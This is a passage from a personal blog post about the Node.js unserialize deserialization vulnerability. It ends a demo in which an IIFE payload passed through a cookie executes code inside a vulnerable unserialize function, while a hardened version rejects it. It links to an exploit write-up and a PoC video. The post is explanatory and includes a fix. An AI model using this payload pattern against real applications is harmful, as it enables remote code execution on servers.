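
  // With "()": the body executes inside unserialize and obj.rce is its return value.
  const b = unserializeVulnerable(fromCookie(toCookie(payloadIIFE)));
  const afterIIFE = globalThis.__executed; // now 1

  // Hardened version rejects the payload before any eval.
  let safeRejected = false;
  try { unserializeSafe(fromCookie(toCookie(payloadIIFE))); } catch (e) { safeRejected = true; }

  return { noIIFEType: typeof a.rce, afterNoIIFE, iifeValue: b.rce, afterIIFE, safeRejected };
}

console.log(demo());
```

<p>Run it with <code>node</code>. <code>demo()</code> returns <code>afterNoIIFE: 0</code> and <code>noIIFEType: 'function'</code> for the payload without the trailing <code>()</code>, and <code>afterIIFE: 1</code> with <code>iifeValue: 'ran'</code> for the IIFE payload, which is exactly why the writeup's payload ends in <code>}()</code>; <code>safeRejected</code> is <code>true</code> because the hardened version never reaches eval.</p>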
<p>PS: <a href="https://www.zhihu.com/question/24503813" target="_blank" rel="noopener">What is a reverse shell?</a><br><a href="https://www.exploit-db.com/docs/41289.pdf" target="_blank" rel="noopener">Original vulnerability write-up</a><br><a href="https://www.youtube.com/watch?v=GFacPoWOcw0" target="_blank" rel="noopener">PoC demo video</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/nodejs/">nodejs</a>
            
              <a href="/tags/unserialize/">unserialize</a>
            
              <a href="/tags/shell/">shell</a>
            
              <a href="/tags/IIFE/">IIFE</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/05/19/Mysql安装和操作-flask/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">MySQL installation and operation (flask)</span>
        <span class="prev-text nav-mobile">Previous</span>
      </a>
    
    
      <a class="next" href="/2017/05/17/痛苦的数据结构OJ/">
        <span class="next-text nav-default">The painful data-structures OJ</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/05/18/nodejs反序列化漏洞/';
        this.page.identifier = '2017/05/18/nodejs反序列化漏洞/';
        this.page.title = 'nodejs反序列化漏洞';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
